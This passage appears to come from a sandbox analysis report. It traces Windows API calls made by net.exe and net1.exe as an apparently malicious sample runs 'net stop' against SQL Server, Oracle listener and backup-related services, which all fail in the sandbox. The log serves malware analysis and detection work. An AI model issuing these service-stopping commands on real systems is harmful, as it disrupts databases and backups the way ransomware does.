lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLServerADHelper100", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1af28c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLServerADHelper100", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af2d8 | out: lpCommandLine="net stop MSSQLServerADHelper100", lpProcessInformation=0x1af2d8*(hProcess=0x78, hThread=0x74, dwProcessId=0x8fc, dwThreadId=0x888)) returned 1 [0069.475] CloseHandle (hObject=0x74) returned 1 [0069.475] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0069.475] GetProcessHeap () returned 0x3d0000 [0069.475] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e5f18 | out: hHeap=0x3d0000) returned 1 [0069.475] GetEnvironmentStringsW () returned 0x3e5f18* [0069.475] GetProcessHeap () returned 0x3d0000 [0069.475] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb36) returned 0x3e40d8 [0069.475] FreeEnvironmentStringsW (penv=0x3e5f18) returned 1 [0069.475] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.294] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x1af1cc | out: lpExitCode=0x1af1cc*=0x2) returned 1 [0072.295] CloseHandle (hObject=0x78) returned 1 [0072.295] _vsnwprintf (in: _Buffer=0x1af314, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af1d8 | out: _Buffer="00000002") returned 8 [0072.295] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.295] GetProcessHeap () returned 0x3d0000 [0072.295] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e40d8 | out: hHeap=0x3d0000) returned 1 [0072.295] GetEnvironmentStringsW () returned 0x3e40d8* [0072.296] GetProcessHeap () returned 0x3d0000 [0072.296] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb5c) returned 0x3e95c0 [0072.296] FreeEnvironmentStringsW (penv=0x3e40d8) returned 1 [0072.296] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.296] GetProcessHeap () returned 0x3d0000 [0072.296] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e95c0 | out: hHeap=0x3d0000) returned 1 [0072.296] GetEnvironmentStringsW () returned 0x3e40d8* [0072.296] GetProcessHeap () returned 0x3d0000 [0072.296] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb5c) returned 0x3e95c0 [0072.296] FreeEnvironmentStringsW (penv=0x3e40d8) returned 1 [0072.296] GetProcessHeap () returned 0x3d0000 [0072.296] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3dff40 | out: hHeap=0x3d0000) returned 1 [0072.296] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af230 | out: lpAttributeList=0x1af230) [0072.296] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.296] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.296] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.296] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.297] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.297] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.297] SetConsoleInputExeNameW () returned 0x1 [0072.297] GetConsoleOutputCP () returned 0x1b5 [0072.297] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.297] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.297] exit (_Code=2) Process: id = "32" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1eb1000" os_pid = "0x88c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x958" cmd_line = "C:\\Windows\\system32\\net1 stop DbxSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 58 os_tid = 0x890 [0065.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15fc68 | out: lpSystemTimeAsFileTime=0x15fc68*(dwLowDateTime=0x95c98830, dwHighDateTime=0x1d57b18)) [0065.259] GetCurrentProcessId () returned 0x88c [0065.259] GetCurrentThreadId () returned 0x890 [0065.259] GetTickCount () returned 0x114a526 [0065.259] QueryPerformanceCounter (in: lpPerformanceCount=0x15fc60 | out: lpPerformanceCount=0x15fc60*=18548040697) returned 1 [0065.259] GetModuleHandleA (lpModuleName=0x0) returned 0xd90000 [0065.259] __set_app_type (_Type=0x1) [0065.259] __p__fmode () returned 0x74eb31f4 [0065.259] __p__commode () returned 0x74eb31fc [0065.259] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd9ffe6) returned 0x0 [0065.260] __getmainargs (in: _Argc=0xda9064, _Argv=0xda906c, _Env=0xda9068, _DoWildCard=0, _StartInfo=0xda9024 | out: _Argc=0xda9064, _Argv=0xda906c, _Env=0xda9068) returned 0 [0065.260] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.260] GetConsoleOutputCP () returned 0x1b5 [0065.260] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xda9080 | out: lpCPInfo=0xda9080) returned 1 [0065.260] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.263] sprintf_s (in: _DstBuf=0x15fc20, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0065.263] setlocale (category=0, locale=".437") returned="English_United States.437" [0065.265] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0065.265] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0065.265] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop DbxSvc" [0065.265] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x15f9ec, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0065.265] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x56) returned 0x573b98 [0065.265] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x15fbf0 | out: Buffer=0x15fbf0*=0x571bf0) returned 0x0 [0065.265] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x15fbf0 | out: Buffer=0x15fbf0*=0x571c08) returned 0x0 [0065.265] _fileno (_File=0x74eb2900) returned 0 [0065.265] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0065.265] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0065.265] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0065.265] _wcsicmp (_String1="config", _String2="stop") returned -16 [0065.265] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0065.265] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0065.265] _wcsicmp (_String1="file", _String2="stop") returned -13 [0065.266] _wcsicmp (_String1="files", _String2="stop") returned -13 [0065.266] _wcsicmp (_String1="group", _String2="stop") returned -12 [0065.266] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0065.266] _wcsicmp (_String1="help", _String2="stop") returned -11 [0065.266] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0065.266] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0065.266] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0065.266] _wcsicmp (_String1="session", _String2="stop") returned -15 [0065.266] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0065.266] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0065.266] _wcsicmp (_String1="share", _String2="stop") returned -12 [0065.266] _wcsicmp (_String1="start", _String2="stop") returned -14 [0065.266] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0065.266] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0065.266] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0065.266] _wcsicmp (_String1="accounts", _String2="DbxSvc") returned -3 [0065.266] _wcsicmp (_String1="computer", _String2="DbxSvc") returned -1 [0065.266] _wcsicmp (_String1="config", _String2="DbxSvc") returned -1 [0065.266] _wcsicmp (_String1="continue", _String2="DbxSvc") returned -1 [0065.266] _wcsicmp (_String1="cont", _String2="DbxSvc") returned -1 [0065.266] _wcsicmp (_String1="file", _String2="DbxSvc") returned 2 [0065.266] _wcsicmp (_String1="files", _String2="DbxSvc") returned 2 [0065.266] _wcsicmp (_String1="group", _String2="DbxSvc") returned 3 [0065.266] _wcsicmp (_String1="groups", _String2="DbxSvc") returned 3 [0065.266] _wcsicmp (_String1="help", _String2="DbxSvc") returned 4 [0065.266] _wcsicmp (_String1="helpmsg", _String2="DbxSvc") returned 4 [0065.266] _wcsicmp (_String1="localgroup", _String2="DbxSvc") returned 8 [0065.266] _wcsicmp (_String1="pause", _String2="DbxSvc") returned 12 [0065.266] _wcsicmp (_String1="session", _String2="DbxSvc") returned 15 [0065.266] _wcsicmp (_String1="sessions", _String2="DbxSvc") returned 15 [0065.266] _wcsicmp (_String1="sess", _String2="DbxSvc") returned 15 [0065.266] _wcsicmp (_String1="share", _String2="DbxSvc") returned 15 [0065.266] _wcsicmp (_String1="start", _String2="DbxSvc") returned 15 [0065.266] _wcsicmp (_String1="stats", _String2="DbxSvc") returned 15 [0065.266] _wcsicmp (_String1="statistics", _String2="DbxSvc") returned 15 [0065.266] _wcsicmp (_String1="stop", _String2="DbxSvc") returned 15 [0065.266] _wcsicmp (_String1="time", _String2="DbxSvc") returned 16 [0065.267] _wcsicmp (_String1="user", _String2="DbxSvc") returned 17 [0065.267] _wcsicmp (_String1="users", _String2="DbxSvc") returned 17 [0065.267] _wcsicmp (_String1="msg", _String2="DbxSvc") returned 9 [0065.267] _wcsicmp (_String1="messenger", _String2="DbxSvc") returned 9 [0065.267] _wcsicmp (_String1="receiver", _String2="DbxSvc") returned 14 [0065.267] _wcsicmp (_String1="rcv", _String2="DbxSvc") returned 14 [0065.267] _wcsicmp (_String1="netpopup", _String2="DbxSvc") returned 10 [0065.267] _wcsicmp (_String1="redirector", _String2="DbxSvc") returned 14 [0065.267] _wcsicmp (_String1="redir", _String2="DbxSvc") returned 14 [0065.267] _wcsicmp (_String1="rdr", _String2="DbxSvc") returned 14 [0065.267] _wcsicmp (_String1="workstation", _String2="DbxSvc") returned 19 [0065.267] _wcsicmp (_String1="work", _String2="DbxSvc") returned 19 [0065.267] _wcsicmp (_String1="wksta", _String2="DbxSvc") returned 19 [0065.267] _wcsicmp (_String1="prdr", _String2="DbxSvc") returned 12 [0065.267] _wcsicmp (_String1="devrdr", _String2="DbxSvc") returned 3 [0065.267] _wcsicmp (_String1="lanmanworkstation", _String2="DbxSvc") returned 8 [0065.267] _wcsicmp (_String1="server", _String2="DbxSvc") returned 15 [0065.267] _wcsicmp (_String1="svr", _String2="DbxSvc") returned 15 [0065.267] _wcsicmp (_String1="srv", _String2="DbxSvc") returned 15 [0065.267] _wcsicmp (_String1="lanmanserver", _String2="DbxSvc") returned 8 [0065.267] _wcsicmp (_String1="alerter", _String2="DbxSvc") returned -3 [0065.267] _wcsicmp (_String1="netlogon", _String2="DbxSvc") returned 10 [0065.267] _wcsupr (in: _String="DbxSvc" | out: _String="DBXSVC") returned="DBXSVC" [0065.268] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x575468 [0065.272] GetServiceKeyNameW (in: hSCManager=0x575468, lpDisplayName="DBXSVC", lpServiceName=0xdaaaf0, lpcchBuffer=0x15fb8c | out: lpServiceName="", lpcchBuffer=0x15fb8c) returned 0 [0065.275] _wcsicmp (_String1="msg", _String2="DBXSVC") returned 9 [0065.275] _wcsicmp (_String1="messenger", _String2="DBXSVC") returned 9 [0065.275] _wcsicmp (_String1="receiver", _String2="DBXSVC") returned 14 [0065.275] _wcsicmp (_String1="rcv", _String2="DBXSVC") returned 14 [0065.275] _wcsicmp (_String1="redirector", _String2="DBXSVC") returned 14 [0065.275] _wcsicmp (_String1="redir", _String2="DBXSVC") returned 14 [0065.275] _wcsicmp (_String1="rdr", _String2="DBXSVC") returned 14 [0065.275] _wcsicmp (_String1="workstation", _String2="DBXSVC") returned 19 [0065.275] _wcsicmp (_String1="work", _String2="DBXSVC") returned 19 [0065.275] _wcsicmp (_String1="wksta", _String2="DBXSVC") returned 19 [0065.275] _wcsicmp (_String1="prdr", _String2="DBXSVC") returned 12 [0065.275] _wcsicmp (_String1="devrdr", _String2="DBXSVC") returned 3 [0065.275] _wcsicmp (_String1="lanmanworkstation", _String2="DBXSVC") returned 8 [0065.276] _wcsicmp (_String1="server", _String2="DBXSVC") returned 15 [0065.276] _wcsicmp (_String1="svr", _String2="DBXSVC") returned 15 [0065.276] _wcsicmp (_String1="srv", _String2="DBXSVC") returned 15 [0065.276] _wcsicmp (_String1="lanmanserver", _String2="DBXSVC") returned 8 [0065.276] _wcsicmp (_String1="alerter", _String2="DBXSVC") returned -3 [0065.276] _wcsicmp (_String1="netlogon", _String2="DBXSVC") returned 10 [0065.276] NetServiceControl (in: servername=0x0, service="DBXSVC", opcode=0x0, arg=0x0, bufptr=0x15fb88 | out: bufptr=0x15fb88) returned 0x889 [0065.277] wcscpy_s (in: _Destination=0xdaa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0065.277] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ed0000 [0065.280] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ed0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xdab338, nSize=0x800, Arguments=0xda9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0065.281] GetFileType (hFile=0xb) returned 0x2 [0065.281] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x15faa8 | out: lpMode=0x15faa8) returned 1 [0065.282] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xdab338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x15fac8, lpReserved=0x0 | out: lpBuffer=0xdab338*, lpNumberOfCharsWritten=0x15fac8*=0x1e) returned 1 [0065.282] GetFileType (hFile=0xb) returned 0x2 [0065.282] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x15faa8 | out: lpMode=0x15faa8) returned 1 [0065.283] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xd916cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x15fac8, lpReserved=0x0 | out: lpBuffer=0xd916cc*, lpNumberOfCharsWritten=0x15fac8*=0x2) returned 1 [0065.283] _ultow (in: _Dest=0x889, _Radix=1440504 | out: _Dest=0x889) returned="2185" [0065.283] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ed0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xdab338, nSize=0x800, Arguments=0xda9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0065.283] GetFileType (hFile=0xb) returned 0x2 [0065.283] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x15fab4 | out: lpMode=0x15fab4) returned 1 [0065.283] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xdab338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x15fad4, lpReserved=0x0 | out: lpBuffer=0xdab338*, lpNumberOfCharsWritten=0x15fad4*=0x34) returned 1 [0065.284] GetFileType (hFile=0xb) returned 0x2 [0065.284] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x15fab4 | out: lpMode=0x15fab4) returned 1 [0065.284] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xd916cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x15fad4, lpReserved=0x0 | out: lpBuffer=0xd916cc*, lpNumberOfCharsWritten=0x15fad4*=0x2) returned 1 [0065.285] NetApiBufferFree (Buffer=0x571bf0) returned 0x0 [0065.285] NetApiBufferFree (Buffer=0x571c08) returned 0x0 [0065.285] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop DbxSvc" [0065.285] exit (_Code=2) Process: id = "33" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1a83000" os_pid = "0x89c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0x6b4" cmd_line = "C:\\Windows\\system32\\net1 stop OracleXETNSListener" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 60 os_tid = 0x8a0 [0065.086] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fb6c | out: lpSystemTimeAsFileTime=0x18fb6c*(dwLowDateTime=0x95af5910, dwHighDateTime=0x1d57b18)) [0065.086] GetCurrentProcessId () returned 0x89c [0065.086] GetCurrentThreadId () returned 0x8a0 [0065.086] GetTickCount () returned 0x114a47a [0065.086] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb64 | out: lpPerformanceCount=0x18fb64*=18530784394) returned 1 [0065.087] GetModuleHandleA (lpModuleName=0x0) returned 0xd90000 [0065.087] __set_app_type (_Type=0x1) [0065.087] __p__fmode () returned 0x74eb31f4 [0065.087] __p__commode () returned 0x74eb31fc [0065.088] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd9ffe6) returned 0x0 [0065.088] __getmainargs (in: _Argc=0xda9064, _Argv=0xda906c, _Env=0xda9068, _DoWildCard=0, _StartInfo=0xda9024 | out: _Argc=0xda9064, _Argv=0xda906c, _Env=0xda9068) returned 0 [0065.088] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.088] GetConsoleOutputCP () returned 0x1b5 [0065.088] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xda9080 | out: lpCPInfo=0xda9080) returned 1 [0065.088] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.091] sprintf_s (in: _DstBuf=0x18fb24, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0065.091] setlocale (category=0, locale=".437") returned="English_United States.437" [0065.288] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0065.288] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0065.288] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop OracleXETNSListener" [0065.288] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f8f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0065.288] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x70) returned 0x683bc0 [0065.288] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18faf4 | out: Buffer=0x18faf4*=0x681c18) returned 0x0 [0065.288] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18faf4 | out: Buffer=0x18faf4*=0x681c30) returned 0x0 [0065.288] _fileno (_File=0x74eb2900) returned 0 [0065.288] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0065.288] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0065.288] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0065.288] _wcsicmp (_String1="config", _String2="stop") returned -16 [0065.288] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0065.288] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0065.288] _wcsicmp (_String1="file", _String2="stop") returned -13 [0065.288] _wcsicmp (_String1="files", _String2="stop") returned -13 [0065.288] _wcsicmp (_String1="group", _String2="stop") returned -12 [0065.288] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0065.288] _wcsicmp (_String1="help", _String2="stop") returned -11 [0065.288] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0065.288] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0065.288] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0065.288] _wcsicmp (_String1="session", _String2="stop") returned -15 [0065.288] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0065.288] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0065.289] _wcsicmp (_String1="share", _String2="stop") returned -12 [0065.289] _wcsicmp (_String1="start", _String2="stop") returned -14 [0065.289] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0065.289] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0065.289] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0065.289] _wcsicmp (_String1="accounts", _String2="OracleXETNSListener") returned -14 [0065.289] _wcsicmp (_String1="computer", _String2="OracleXETNSListener") returned -12 [0065.289] _wcsicmp (_String1="config", _String2="OracleXETNSListener") returned -12 [0065.289] _wcsicmp (_String1="continue", _String2="OracleXETNSListener") returned -12 [0065.289] _wcsicmp (_String1="cont", _String2="OracleXETNSListener") returned -12 [0065.289] _wcsicmp (_String1="file", _String2="OracleXETNSListener") returned -9 [0065.289] _wcsicmp (_String1="files", _String2="OracleXETNSListener") returned -9 [0065.289] _wcsicmp (_String1="group", _String2="OracleXETNSListener") returned -8 [0065.289] _wcsicmp (_String1="groups", _String2="OracleXETNSListener") returned -8 [0065.289] _wcsicmp (_String1="help", _String2="OracleXETNSListener") returned -7 [0065.289] _wcsicmp (_String1="helpmsg", _String2="OracleXETNSListener") returned -7 [0065.289] _wcsicmp (_String1="localgroup", _String2="OracleXETNSListener") returned -3 [0065.289] _wcsicmp (_String1="pause", _String2="OracleXETNSListener") returned 1 [0065.289] _wcsicmp (_String1="session", _String2="OracleXETNSListener") returned 4 [0065.289] _wcsicmp (_String1="sessions", _String2="OracleXETNSListener") returned 4 [0065.289] _wcsicmp (_String1="sess", _String2="OracleXETNSListener") returned 4 [0065.289] _wcsicmp (_String1="share", _String2="OracleXETNSListener") returned 4 [0065.289] _wcsicmp (_String1="start", _String2="OracleXETNSListener") returned 4 [0065.289] _wcsicmp (_String1="stats", _String2="OracleXETNSListener") returned 4 [0065.289] _wcsicmp (_String1="statistics", _String2="OracleXETNSListener") returned 4 [0065.289] _wcsicmp (_String1="stop", _String2="OracleXETNSListener") returned 4 [0065.289] _wcsicmp (_String1="time", _String2="OracleXETNSListener") returned 5 [0065.289] _wcsicmp (_String1="user", _String2="OracleXETNSListener") returned 6 [0065.289] _wcsicmp (_String1="users", _String2="OracleXETNSListener") returned 6 [0065.289] _wcsicmp (_String1="msg", _String2="OracleXETNSListener") returned -2 [0065.289] _wcsicmp (_String1="messenger", _String2="OracleXETNSListener") returned -2 [0065.289] _wcsicmp (_String1="receiver", _String2="OracleXETNSListener") returned 3 [0065.289] _wcsicmp (_String1="rcv", _String2="OracleXETNSListener") returned 3 [0065.289] _wcsicmp (_String1="netpopup", _String2="OracleXETNSListener") returned -1 [0065.289] _wcsicmp (_String1="redirector", _String2="OracleXETNSListener") returned 3 [0065.289] _wcsicmp (_String1="redir", _String2="OracleXETNSListener") returned 3 [0065.290] _wcsicmp (_String1="rdr", _String2="OracleXETNSListener") returned 3 [0065.290] _wcsicmp (_String1="workstation", _String2="OracleXETNSListener") returned 8 [0065.290] _wcsicmp (_String1="work", _String2="OracleXETNSListener") returned 8 [0065.290] _wcsicmp (_String1="wksta", _String2="OracleXETNSListener") returned 8 [0065.290] _wcsicmp (_String1="prdr", _String2="OracleXETNSListener") returned 1 [0065.290] _wcsicmp (_String1="devrdr", _String2="OracleXETNSListener") returned -11 [0065.290] _wcsicmp (_String1="lanmanworkstation", _String2="OracleXETNSListener") returned -3 [0065.290] _wcsicmp (_String1="server", _String2="OracleXETNSListener") returned 4 [0065.290] _wcsicmp (_String1="svr", _String2="OracleXETNSListener") returned 4 [0065.290] _wcsicmp (_String1="srv", _String2="OracleXETNSListener") returned 4 [0065.290] _wcsicmp (_String1="lanmanserver", _String2="OracleXETNSListener") returned -3 [0065.290] _wcsicmp (_String1="alerter", _String2="OracleXETNSListener") returned -14 [0065.290] _wcsicmp (_String1="netlogon", _String2="OracleXETNSListener") returned -1 [0065.290] _wcsupr (in: _String="OracleXETNSListener" | out: _String="ORACLEXETNSLISTENER") returned="ORACLEXETNSLISTENER" [0065.290] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6854a8 [0065.293] GetServiceKeyNameW (in: hSCManager=0x6854a8, lpDisplayName="ORACLEXETNSLISTENER", lpServiceName=0xdaaaf0, lpcchBuffer=0x18fa90 | out: lpServiceName="", lpcchBuffer=0x18fa90) returned 0 [0065.293] _wcsicmp (_String1="msg", _String2="ORACLEXETNSLISTENER") returned -2 [0065.293] _wcsicmp (_String1="messenger", _String2="ORACLEXETNSLISTENER") returned -2 [0065.293] _wcsicmp (_String1="receiver", _String2="ORACLEXETNSLISTENER") returned 3 [0065.293] _wcsicmp (_String1="rcv", _String2="ORACLEXETNSLISTENER") returned 3 [0065.293] _wcsicmp (_String1="redirector", _String2="ORACLEXETNSLISTENER") returned 3 [0065.293] _wcsicmp (_String1="redir", _String2="ORACLEXETNSLISTENER") returned 3 [0065.293] _wcsicmp (_String1="rdr", _String2="ORACLEXETNSLISTENER") returned 3 [0065.293] _wcsicmp (_String1="workstation", _String2="ORACLEXETNSLISTENER") returned 8 [0065.293] _wcsicmp (_String1="work", _String2="ORACLEXETNSLISTENER") returned 8 [0065.294] _wcsicmp (_String1="wksta", _String2="ORACLEXETNSLISTENER") returned 8 [0065.294] _wcsicmp (_String1="prdr", _String2="ORACLEXETNSLISTENER") returned 1 [0065.294] _wcsicmp (_String1="devrdr", _String2="ORACLEXETNSLISTENER") returned -11 [0065.294] _wcsicmp (_String1="lanmanworkstation", _String2="ORACLEXETNSLISTENER") returned -3 [0065.294] _wcsicmp (_String1="server", _String2="ORACLEXETNSLISTENER") returned 4 [0065.294] _wcsicmp (_String1="svr", _String2="ORACLEXETNSLISTENER") returned 4 [0065.294] _wcsicmp (_String1="srv", _String2="ORACLEXETNSLISTENER") returned 4 [0065.294] _wcsicmp (_String1="lanmanserver", _String2="ORACLEXETNSLISTENER") returned -3 [0065.294] _wcsicmp (_String1="alerter", _String2="ORACLEXETNSLISTENER") returned -14 [0065.294] _wcsicmp (_String1="netlogon", _String2="ORACLEXETNSLISTENER") returned -1 [0065.294] NetServiceControl (in: servername=0x0, service="ORACLEXETNSLISTENER", opcode=0x0, arg=0x0, bufptr=0x18fa8c | out: bufptr=0x18fa8c) returned 0x889 [0065.295] wcscpy_s (in: _Destination=0xdaa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0065.295] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ed0000 [0065.295] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ed0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xdab338, nSize=0x800, Arguments=0xda9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0065.297] GetFileType (hFile=0xb) returned 0x2 [0065.297] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f9ac | out: lpMode=0x18f9ac) returned 1 [0065.297] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xdab338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f9cc, lpReserved=0x0 | out: lpBuffer=0xdab338*, lpNumberOfCharsWritten=0x18f9cc*=0x1e) returned 1 [0065.297] GetFileType (hFile=0xb) returned 0x2 [0065.298] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f9ac | out: lpMode=0x18f9ac) returned 1 [0065.298] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xd916cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f9cc, lpReserved=0x0 | out: lpBuffer=0xd916cc*, 